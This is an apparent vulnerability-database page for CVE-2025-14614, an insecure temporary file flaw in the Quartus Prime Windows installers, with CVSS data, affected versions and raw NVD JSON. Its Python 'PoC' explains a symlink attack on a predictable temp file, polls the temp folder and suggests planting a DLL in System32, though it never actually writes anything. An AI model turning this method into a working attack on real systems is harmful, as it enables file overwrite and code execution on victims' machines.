Security Vulnerability Report
CVE-2025-14614 CVSS 6.7 MEDIUM

CVE-2025-14614

Published: 2026-01-07 12:16:55
Last Modified: 2026-01-12 15:16:29
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Insecure Temporary File vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite Installer (SFX) on Windows allows Explore for Predictable Temporary File Names. This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1.

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:* - VULNERABLE
cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Altera Quartus Prime Standard 23.1
Altera Quartus Prime Standard 23.2
Altera Quartus Prime Standard 23.3
Altera Quartus Prime Standard 23.4
Altera Quartus Prime Standard 24.1
Altera Quartus Prime Lite 23.1
Altera Quartus Prime Lite 23.2
Altera Quartus Prime Lite 23.3
Altera Quartus Prime Lite 23.4
Altera Quartus Prime Lite 24.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14614 PoC - Insecure Temporary File in Quartus Prime Installer

This PoC demonstrates the concept of predictable temporary file exploitation.
Note: Actual exploitation requires local access and user interaction.
"""

import os
import sys
import time


def create_symlink_attack(target_path, malicious_content):
    """
    Simulate a symlink attack on predictable temporary files.
    In real attack, this would be combined with the installer's temp file pattern.
    """
    print("[*] Setting up symlink attack...")
    print(f"[*] Target path: {target_path}")

    # In actual attack, the installer would use a predictable temp file name
    # like: %TEMP%\quartus_install_XXXX.tmp
    temp_file_pattern = os.path.join(os.environ.get('TEMP', '/tmp'), 'quartus_install_0001.tmp')

    print(f"[*] Predictable temp file: {temp_file_pattern}")
    print(f"[*] Creating symlink to target: {target_path}")

    # Note: Creating symlinks typically requires admin privileges on Windows
    # or Developer Mode enabled
    try:
        # Clean up any existing file at the predictable path
        if os.path.exists(temp_file_pattern):
            os.remove(temp_file_pattern)

        # No symlink is created and malicious_content is never written;
        # the scenario is only described:
        # In real attack scenario:
        # 1. Attacker creates symlink from temp_file_pattern to target
        # 2. Victim runs Quartus Prime installer
        # 3. Installer writes to temp_file_pattern (follows symlink)
        # 4. Malicious content is written to target location

        print("[!] This is a demonstration of the attack concept")
        print("[!] Actual exploitation requires:")
        print("[!] 1. Local access to the target system")
        print("[!] 2. Ability to create symlinks (Admin or Developer Mode)")
        print("[!] 3. User interaction to run the installer")

        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def monitor_temp_files():
    """Monitor for installer temp file creation patterns"""
    temp_dir = os.environ.get('TEMP', '/tmp')
    print(f"[*] Monitoring temp directory: {temp_dir}")

    # Look for quartus-related temp files
    known_patterns = ['quartus', 'altera', 'install']

    while True:
        try:
            for item in os.listdir(temp_dir):
                item_lower = item.lower()
                if any(pattern in item_lower for pattern in known_patterns):
                    print(f"[+] Found potential temp file: {item}")
        except OSError:
            # Directory missing or unreadable; retry on the next poll
            pass
        time.sleep(2)


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-14614 - Insecure Temporary File PoC")
    print("Quartus Prime Installer Temp File Predictability")
    print("=" * 60)

    if len(sys.argv) > 1:
        target = sys.argv[1]
        create_symlink_attack(target, "malicious content")
    else:
        print("Usage: python cve_2025_14614_poc.py <target_path>")
        print("Example: python cve_2025_14614_poc.py C:\\Windows\\System32\\malicious.dll")

References

https://www.altera.com/security/security-advisory/asa-0005 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14614", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T12:16:55.467", "lastModified": "2026-01-12T15:16:28.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Temporary File vulnerability in Altera Quartus Prime Standard \n\nInstaller (SFX)\n\n on Windows, Altera Quartus Prime Lite \n\nInstaller (SFX)\n\n on Windows allows Explore for Predictable Temporary File Names.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1."}, {"lang": "es", "value": "Vulnerabilidad de archivo temporal inseguro en el Instalador (SFX) de Altera Quartus Prime Standard en Windows, el Instalador (SFX) de Altera Quartus Prime Lite en Windows permite la exploración de nombres de archivos temporales predecibles. Este problema afecta a Quartus Prime Standard: desde 23.1 hasta 24.1; Quartus Prime Lite: desde 23.1 hasta 24.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "3C682DFC-7352-43BD-9138-341634CDE948"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "297C4320-AA94-4418-9B31-8072877B7F55"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": 
"https://www.altera.com/security/security-advisory/asa-0005", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}